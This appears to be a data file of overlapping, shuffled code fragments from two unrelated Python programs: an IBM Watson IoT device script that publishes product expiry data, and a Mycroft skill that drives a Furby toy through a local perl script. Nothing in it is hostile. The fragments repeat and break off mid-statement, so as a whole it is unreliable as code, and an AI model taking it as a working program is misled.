information: 'message'\") else:", "try: deviceOptions = {\"org\": organization, \"type\": deviceType, \"id\": deviceId, \"auth-method\": authMethod, \"auth-token\": authToken}", "\"greeting\" 10 times deviceCli.connect() while True: products = \"Pasta\",\"bread\",\"butter\",\"panner\" product_ids = 12345,3413,2341,4501 expiry_dates", "\"20-02-2021\",\"22-02-2021\",\"12-05-2021\",\"12-05-2021\" data = {\"prod_name\":products, \"pro_id\":product_ids, \"expiry_date\":expiry_dates} #print data def myOnPublishCallback(): print (\"Published Data", "product_ids = 12345,3413,2341,4501 expiry_dates = \"20-02-2021\",\"22-02-2021\",\"12-05-2021\",\"12-05-2021\" data = {\"prod_name\":products, \"pro_id\":product_ids, \"expiry_date\":expiry_dates} #print data", "print(\"Error - command is missing required information: 'interval'\") else: interval = cmd.data['interval'] elif", "command is missing required information: 'message'\") else: print(cmd.data['message']) try: deviceOptions = {\"org\": organization,", "import ibmiotf.device import random import json #Provide your IBM Watson Device Credentials organization", "import random import json #Provide your IBM Watson Device Credentials organization = \"1tzgh7\"", "the cloud as an event of type \"greeting\" 10 times deviceCli.connect() while True:", "your IBM Watson Device Credentials organization = \"1tzgh7\" deviceType = \"iotdevice\" deviceId =", "RECIEVED\") elif cmd.data['command']=='lightoff': print(\"PRODUCT NOT EXPIRED IS RECIEVED\") if cmd.command == \"setInterval\": if", "data, qos=0, on_publish=myOnPublishCallback) if not success: print(\"Not connected to IoTF\") time.sleep(1) deviceCli.commandCallback =", "import time import sys import ibmiotf.application import ibmiotf.device import random import json #Provide", "cloud as an event of type \"greeting\" 10 times deviceCli.connect() while True: products", "not success: print(\"Not connected to IoTF\") time.sleep(1) deviceCli.commandCallback = myCommandCallback # Disconnect the", "print(\"PRODUCT NOT EXPIRED IS RECIEVED\") if cmd.command == \"setInterval\": if 'interval' not in", "qos=0, on_publish=myOnPublishCallback) if not success: print(\"Not connected to IoTF\") time.sleep(1) deviceCli.commandCallback = myCommandCallback", "and send a datapoint \"hello\" with value \"world\" into the cloud as an", "#.............................................. except Exception as e: print(\"Caught exception connecting device: %s\" % str(e)) sys.exit()", "is missing required information: 'interval'\") else: interval = cmd.data['interval'] elif cmd.command == \"print\":", "in cmd.data: print(\"Error - command is missing required information: 'interval'\") else: interval =", "time.sleep(1) deviceCli.commandCallback = myCommandCallback # Disconnect the device and application from the cloud", "= \"Pasta\",\"bread\",\"butter\",\"panner\" product_ids = 12345,3413,2341,4501 expiry_dates = \"20-02-2021\",\"22-02-2021\",\"12-05-2021\",\"12-05-2021\" data = {\"prod_name\":products, \"pro_id\":product_ids, \"expiry_date\":expiry_dates}", "sys import ibmiotf.application import ibmiotf.device import random import json #Provide your IBM Watson", "= \"0000\" authMethod = \"token\" authToken = \"<PASSWORD>\" # Initialize the device client\\", "IS RECIEVED\") elif cmd.data['command']=='lightoff': print(\"PRODUCT NOT EXPIRED IS RECIEVED\") if cmd.command == \"setInterval\":", "print(\"Not connected to IoTF\") time.sleep(1) deviceCli.commandCallback = myCommandCallback # Disconnect the device and", "if 'interval' not in cmd.data: print(\"Error - command is missing required information: 'interval'\")", "True: products = \"Pasta\",\"bread\",\"butter\",\"panner\" product_ids = 12345,3413,2341,4501 expiry_dates = \"20-02-2021\",\"22-02-2021\",\"12-05-2021\",\"12-05-2021\" data = {\"prod_name\":products,", "IBM Watson Device Credentials organization = \"1tzgh7\" deviceType = \"iotdevice\" deviceId = \"0000\"", "'message'\") else: print(cmd.data['message']) try: deviceOptions = {\"org\": organization, \"type\": deviceType, \"id\": deviceId, \"auth-method\":", "str(e)) sys.exit() # Connect and send a datapoint \"hello\" with value \"world\" into", "{\"org\": organization, \"type\": deviceType, \"id\": deviceId, \"auth-method\": authMethod, \"auth-token\": authToken} deviceCli = ibmiotf.device.Client(deviceOptions)", "ibmiotf.device.Client(deviceOptions) #.............................................. except Exception as e: print(\"Caught exception connecting device: %s\" % str(e))", "of type \"greeting\" 10 times deviceCli.connect() while True: products = \"Pasta\",\"bread\",\"butter\",\"panner\" product_ids =", "random import json #Provide your IBM Watson Device Credentials organization = \"1tzgh7\" deviceType", "print (\"Published Data to IBM Watson\") success = deviceCli.publishEvent(\"Data\", \"json\", data, qos=0, on_publish=myOnPublishCallback)", "ibmiotf.application import ibmiotf.device import random import json #Provide your IBM Watson Device Credentials", "import json #Provide your IBM Watson Device Credentials organization = \"1tzgh7\" deviceType =", "send a datapoint \"hello\" with value \"world\" into the cloud as an event", "into the cloud as an event of type \"greeting\" 10 times deviceCli.connect() while", "= \"20-02-2021\",\"22-02-2021\",\"12-05-2021\",\"12-05-2021\" data = {\"prod_name\":products, \"pro_id\":product_ids, \"expiry_date\":expiry_dates} #print data def myOnPublishCallback(): print (\"Published", "required information: 'message'\") else: print(cmd.data['message']) try: deviceOptions = {\"org\": organization, \"type\": deviceType, \"id\":", "= {\"org\": organization, \"type\": deviceType, \"id\": deviceId, \"auth-method\": authMethod, \"auth-token\": authToken} deviceCli =", "cmd.data['command']) if cmd.data['command']=='EXPIRED': print(\"PRODUCT EXPIRED IS RECIEVED\") elif cmd.data['command']=='lightoff': print(\"PRODUCT NOT EXPIRED IS", "= deviceCli.publishEvent(\"Data\", \"json\", data, qos=0, on_publish=myOnPublishCallback) if not success: print(\"Not connected to IoTF\")", "\"json\", data, qos=0, on_publish=myOnPublishCallback) if not success: print(\"Not connected to IoTF\") time.sleep(1) deviceCli.commandCallback", "\"hello\" with value \"world\" into the cloud as an event of type \"greeting\"", "cmd.command == \"print\": if 'message' not in cmd.data: print(\"Error - command is missing", "event of type \"greeting\" 10 times deviceCli.connect() while True: products = \"Pasta\",\"bread\",\"butter\",\"panner\" product_ids", "connected to IoTF\") time.sleep(1) deviceCli.commandCallback = myCommandCallback # Disconnect the device and application", "client\\ def myCommandCallback(cmd): print(\"Command received: %s\" % cmd.data['command']) if cmd.data['command']=='EXPIRED': print(\"PRODUCT EXPIRED IS", "{\"prod_name\":products, \"pro_id\":product_ids, \"expiry_date\":expiry_dates} #print data def myOnPublishCallback(): print (\"Published Data to IBM Watson\")", "\"1tzgh7\" deviceType = \"iotdevice\" deviceId = \"0000\" authMethod = \"token\" authToken = \"<PASSWORD>\"", "as an event of type \"greeting\" 10 times deviceCli.connect() while True: products =", "= \"1tzgh7\" deviceType = \"iotdevice\" deviceId = \"0000\" authMethod = \"token\" authToken =", "Initialize the device client\\ def myCommandCallback(cmd): print(\"Command received: %s\" % cmd.data['command']) if cmd.data['command']=='EXPIRED':", "as e: print(\"Caught exception connecting device: %s\" % str(e)) sys.exit() # Connect and", "time import sys import ibmiotf.application import ibmiotf.device import random import json #Provide your", "deviceCli.commandCallback = myCommandCallback # Disconnect the device and application from the cloud deviceCli.disconnect()", "print(\"Caught exception connecting device: %s\" % str(e)) sys.exit() # Connect and send a", "success = deviceCli.publishEvent(\"Data\", \"json\", data, qos=0, on_publish=myOnPublishCallback) if not success: print(\"Not connected to", "\"setInterval\": if 'interval' not in cmd.data: print(\"Error - command is missing required information:", "cmd.data['interval'] elif cmd.command == \"print\": if 'message' not in cmd.data: print(\"Error - command", "ibmiotf.device import random import json #Provide your IBM Watson Device Credentials organization =", "type \"greeting\" 10 times deviceCli.connect() while True: products = \"Pasta\",\"bread\",\"butter\",\"panner\" product_ids = 12345,3413,2341,4501", "deviceType, \"id\": deviceId, \"auth-method\": authMethod, \"auth-token\": authToken} deviceCli = ibmiotf.device.Client(deviceOptions) #.............................................. except Exception", "while True: products = \"Pasta\",\"bread\",\"butter\",\"panner\" product_ids = 12345,3413,2341,4501 expiry_dates = \"20-02-2021\",\"22-02-2021\",\"12-05-2021\",\"12-05-2021\" data =", "to IBM Watson\") success = deviceCli.publishEvent(\"Data\", \"json\", data, qos=0, on_publish=myOnPublishCallback) if not success:", "expiry_dates = \"20-02-2021\",\"22-02-2021\",\"12-05-2021\",\"12-05-2021\" data = {\"prod_name\":products, \"pro_id\":product_ids, \"expiry_date\":expiry_dates} #print data def myOnPublishCallback(): print", "%s\" % str(e)) sys.exit() # Connect and send a datapoint \"hello\" with value", "= ibmiotf.device.Client(deviceOptions) #.............................................. except Exception as e: print(\"Caught exception connecting device: %s\" %", "12345,3413,2341,4501 expiry_dates = \"20-02-2021\",\"22-02-2021\",\"12-05-2021\",\"12-05-2021\" data = {\"prod_name\":products, \"pro_id\":product_ids, \"expiry_date\":expiry_dates} #print data def myOnPublishCallback():", "authToken = \"<PASSWORD>\" # Initialize the device client\\ def myCommandCallback(cmd): print(\"Command received: %s\"", "organization = \"1tzgh7\" deviceType = \"iotdevice\" deviceId = \"0000\" authMethod = \"token\" authToken", "import sys import ibmiotf.application import ibmiotf.device import random import json #Provide your IBM", "else: print(cmd.data['message']) try: deviceOptions = {\"org\": organization, \"type\": deviceType, \"id\": deviceId, \"auth-method\": authMethod,", "deviceId = \"0000\" authMethod = \"token\" authToken = \"<PASSWORD>\" # Initialize the device", "\"iotdevice\" deviceId = \"0000\" authMethod = \"token\" authToken = \"<PASSWORD>\" # Initialize the", "\"Pasta\",\"bread\",\"butter\",\"panner\" product_ids = 12345,3413,2341,4501 expiry_dates = \"20-02-2021\",\"22-02-2021\",\"12-05-2021\",\"12-05-2021\" data = {\"prod_name\":products, \"pro_id\":product_ids, \"expiry_date\":expiry_dates} #print", "NOT EXPIRED IS RECIEVED\") if cmd.command == \"setInterval\": if 'interval' not in cmd.data:", "cmd.data['command']=='EXPIRED': print(\"PRODUCT EXPIRED IS RECIEVED\") elif cmd.data['command']=='lightoff': print(\"PRODUCT NOT EXPIRED IS RECIEVED\") if", "elif cmd.command == \"print\": if 'message' not in cmd.data: print(\"Error - command is", "is missing required information: 'message'\") else: print(cmd.data['message']) try: deviceOptions = {\"org\": organization, \"type\":", "def myCommandCallback(cmd): print(\"Command received: %s\" % cmd.data['command']) if cmd.data['command']=='EXPIRED': print(\"PRODUCT EXPIRED IS RECIEVED\")", "interval = cmd.data['interval'] elif cmd.command == \"print\": if 'message' not in cmd.data: print(\"Error", "# Connect and send a datapoint \"hello\" with value \"world\" into the cloud", "\"pro_id\":product_ids, \"expiry_date\":expiry_dates} #print data def myOnPublishCallback(): print (\"Published Data to IBM Watson\") success", "if not success: print(\"Not connected to IoTF\") time.sleep(1) deviceCli.commandCallback = myCommandCallback # Disconnect", "authMethod, \"auth-token\": authToken} deviceCli = ibmiotf.device.Client(deviceOptions) #.............................................. except Exception as e: print(\"Caught exception", "e: print(\"Caught exception connecting device: %s\" % str(e)) sys.exit() # Connect and send", "= \"iotdevice\" deviceId = \"0000\" authMethod = \"token\" authToken = \"<PASSWORD>\" # Initialize", "\"print\": if 'message' not in cmd.data: print(\"Error - command is missing required information:", "10 times deviceCli.connect() while True: products = \"Pasta\",\"bread\",\"butter\",\"panner\" product_ids = 12345,3413,2341,4501 expiry_dates =", "\"expiry_date\":expiry_dates} #print data def myOnPublishCallback(): print (\"Published Data to IBM Watson\") success =", "deviceCli.publishEvent(\"Data\", \"json\", data, qos=0, on_publish=myOnPublishCallback) if not success: print(\"Not connected to IoTF\") time.sleep(1)", "deviceCli = ibmiotf.device.Client(deviceOptions) #.............................................. except Exception as e: print(\"Caught exception connecting device: %s\"", "sys.exit() # Connect and send a datapoint \"hello\" with value \"world\" into the", "myCommandCallback(cmd): print(\"Command received: %s\" % cmd.data['command']) if cmd.data['command']=='EXPIRED': print(\"PRODUCT EXPIRED IS RECIEVED\") elif", "organization, \"type\": deviceType, \"id\": deviceId, \"auth-method\": authMethod, \"auth-token\": authToken} deviceCli = ibmiotf.device.Client(deviceOptions) #..............................................", "= \"token\" authToken = \"<PASSWORD>\" # Initialize the device client\\ def myCommandCallback(cmd): print(\"Command", "import ibmiotf.application import ibmiotf.device import random import json #Provide your IBM Watson Device" ]
[ "def handle_furby_purr(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.purr') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"866\"]) @intent_file_handler('furby.sneeze.intent') def handle_furby_sneeze(self,", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.talk') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"869\"]) @intent_file_handler('furby.feed.intent') def handle_furby_feed(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "@intent_file_handler('furby.sleep.intent') def handle_furby_sleep(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sleep') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"862\"]) @intent_file_handler('furby.laugh.intent') def", "message): self.speak_dialog('furby.dance') @intent_file_handler('furby.sleep.intent') def handle_furby_sleep(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sleep') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"862\"])", "\"862\"]) @intent_file_handler('furby.laugh.intent') def handle_furby_laugh(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.laugh') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"863\"]) @intent_file_handler('furby.burp.intent')", "message): self.speak_dialog('furby.tell') @intent_file_handler('furby.dance.intent') def handle_furby_dance(self, message): self.speak_dialog('furby.dance') @intent_file_handler('furby.sleep.intent') def handle_furby_sleep(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "self.speak_dialog('furby.tell') @intent_file_handler('furby.dance.intent') def handle_furby_dance(self, message): self.speak_dialog('furby.dance') @intent_file_handler('furby.sleep.intent') def handle_furby_sleep(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"])", "import subprocess class ControlFurby(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('furby.tell.intent') def handle_furby_tell(self, message): self.speak_dialog('furby.tell') @intent_file_handler('furby.dance.intent')", "@intent_file_handler('furby.purr.intent') def handle_furby_purr(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.purr') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"866\"]) @intent_file_handler('furby.sneeze.intent') def", "\"820\"]) self.speak_dialog('furby.talk') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"869\"]) @intent_file_handler('furby.feed.intent') def handle_furby_feed(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.feed')", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.fart') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"865\"]) @intent_file_handler('furby.purr.intent') def handle_furby_purr(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"])", "handle_furby_dance(self, message): self.speak_dialog('furby.dance') @intent_file_handler('furby.sleep.intent') def handle_furby_sleep(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sleep') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "handle_furby_feed(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.feed') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"853\"]) def stop(self): pass def", "def handle_furby_tell(self, message): self.speak_dialog('furby.tell') @intent_file_handler('furby.dance.intent') def handle_furby_dance(self, message): self.speak_dialog('furby.dance') @intent_file_handler('furby.sleep.intent') def handle_furby_sleep(self, message):", "handle_furby_sleep(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sleep') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"862\"]) @intent_file_handler('furby.laugh.intent') def handle_furby_laugh(self, message):", "self.speak_dialog('furby.purr') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"866\"]) @intent_file_handler('furby.sneeze.intent') def handle_furby_sneeze(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sneeze') subprocess.call([\"perl\",", "@intent_file_handler('furby.feed.intent') def handle_furby_feed(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.feed') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"853\"]) def stop(self):", "\"868\"]) @intent_file_handler('furby.talk.intent') def handle_furby_talk(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.talk') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"869\"]) @intent_file_handler('furby.feed.intent')", "@intent_file_handler('furby.laugh.intent') def handle_furby_laugh(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.laugh') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"863\"]) @intent_file_handler('furby.burp.intent') def", "\"869\"]) @intent_file_handler('furby.feed.intent') def handle_furby_feed(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.feed') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"853\"]) def", "message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.feed') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"853\"]) def stop(self): pass def create_skill():", "MycroftSkill.__init__(self) @intent_file_handler('furby.tell.intent') def handle_furby_tell(self, message): self.speak_dialog('furby.tell') @intent_file_handler('furby.dance.intent') def handle_furby_dance(self, message): self.speak_dialog('furby.dance') @intent_file_handler('furby.sleep.intent') def", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sneeze') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"867\"]) @intent_file_handler('furby.sing.intent') def handle_furby_sing(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"])", "\"820\"]) self.speak_dialog('furby.snide_remark') self.speak_dialog('furby.sing') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"868\"]) @intent_file_handler('furby.talk.intent') def handle_furby_talk(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"])", "subprocess class ControlFurby(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('furby.tell.intent') def handle_furby_tell(self, message): self.speak_dialog('furby.tell') @intent_file_handler('furby.dance.intent') def", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"865\"]) @intent_file_handler('furby.purr.intent') def handle_furby_purr(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.purr') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"866\"])", "\"866\"]) @intent_file_handler('furby.sneeze.intent') def handle_furby_sneeze(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sneeze') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"867\"]) @intent_file_handler('furby.sing.intent')", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.snide_remark') self.speak_dialog('furby.sing') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"868\"]) @intent_file_handler('furby.talk.intent') def handle_furby_talk(self, message): subprocess.call([\"perl\",", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"863\"]) @intent_file_handler('furby.burp.intent') def handle_furby_burp(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.burp') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "def handle_furby_sing(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.snide_remark') self.speak_dialog('furby.sing') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"868\"]) @intent_file_handler('furby.talk.intent') def", "\"820\"]) self.speak_dialog('furby.sleep') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"862\"]) @intent_file_handler('furby.laugh.intent') def handle_furby_laugh(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.laugh')", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"868\"]) @intent_file_handler('furby.talk.intent') def handle_furby_talk(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.talk') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "def handle_furby_sneeze(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sneeze') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"867\"]) @intent_file_handler('furby.sing.intent') def handle_furby_sing(self,", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.burp') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"864\"]) @intent_file_handler('furby.fart.intent') def handle_furby_fart(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.snide_remark') self.speak_dialog('furby.sing') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"868\"]) @intent_file_handler('furby.talk.intent') def handle_furby_talk(self, message):", "@intent_file_handler('furby.sing.intent') def handle_furby_sing(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.snide_remark') self.speak_dialog('furby.sing') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"868\"]) @intent_file_handler('furby.talk.intent')", "\"865\"]) @intent_file_handler('furby.purr.intent') def handle_furby_purr(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.purr') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"866\"]) @intent_file_handler('furby.sneeze.intent')", "message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.fart') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"865\"]) @intent_file_handler('furby.purr.intent') def handle_furby_purr(self, message): subprocess.call([\"perl\",", "handle_furby_burp(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.burp') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"864\"]) @intent_file_handler('furby.fart.intent') def handle_furby_fart(self, message):", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.purr') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"866\"]) @intent_file_handler('furby.sneeze.intent') def handle_furby_sneeze(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "<filename>__init__.py from mycroft import MycroftSkill, intent_file_handler import subprocess class ControlFurby(MycroftSkill): def __init__(self): MycroftSkill.__init__(self)", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sneeze') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"867\"]) @intent_file_handler('furby.sing.intent') def handle_furby_sing(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.feed') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"853\"]) def stop(self): pass def create_skill(): return ControlFurby()", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.snide_remark') self.speak_dialog('furby.sing') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"868\"]) @intent_file_handler('furby.talk.intent') def handle_furby_talk(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "def handle_furby_talk(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.talk') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"869\"]) @intent_file_handler('furby.feed.intent') def handle_furby_feed(self,", "@intent_file_handler('furby.tell.intent') def handle_furby_tell(self, message): self.speak_dialog('furby.tell') @intent_file_handler('furby.dance.intent') def handle_furby_dance(self, message): self.speak_dialog('furby.dance') @intent_file_handler('furby.sleep.intent') def handle_furby_sleep(self,", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"867\"]) @intent_file_handler('furby.sing.intent') def handle_furby_sing(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.snide_remark') self.speak_dialog('furby.sing') subprocess.call([\"perl\",", "intent_file_handler import subprocess class ControlFurby(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('furby.tell.intent') def handle_furby_tell(self, message): self.speak_dialog('furby.tell')", "class ControlFurby(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('furby.tell.intent') def handle_furby_tell(self, message): self.speak_dialog('furby.tell') @intent_file_handler('furby.dance.intent') def handle_furby_dance(self,", "handle_furby_purr(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.purr') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"866\"]) @intent_file_handler('furby.sneeze.intent') def handle_furby_sneeze(self, message):", "@intent_file_handler('furby.fart.intent') def handle_furby_fart(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.fart') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"865\"]) @intent_file_handler('furby.purr.intent') def", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"866\"]) @intent_file_handler('furby.sneeze.intent') def handle_furby_sneeze(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sneeze') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"867\"])", "self.speak_dialog('furby.sing') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"868\"]) @intent_file_handler('furby.talk.intent') def handle_furby_talk(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.talk') subprocess.call([\"perl\",", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sleep') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"862\"]) @intent_file_handler('furby.laugh.intent') def handle_furby_laugh(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"])", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.talk') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"869\"]) @intent_file_handler('furby.feed.intent') def handle_furby_feed(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"])", "message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sleep') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"862\"]) @intent_file_handler('furby.laugh.intent') def handle_furby_laugh(self, message): subprocess.call([\"perl\",", "\"820\"]) self.speak_dialog('furby.sneeze') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"867\"]) @intent_file_handler('furby.sing.intent') def handle_furby_sing(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.snide_remark')", "handle_furby_sneeze(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sneeze') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"867\"]) @intent_file_handler('furby.sing.intent') def handle_furby_sing(self, message):", "ControlFurby(MycroftSkill): def 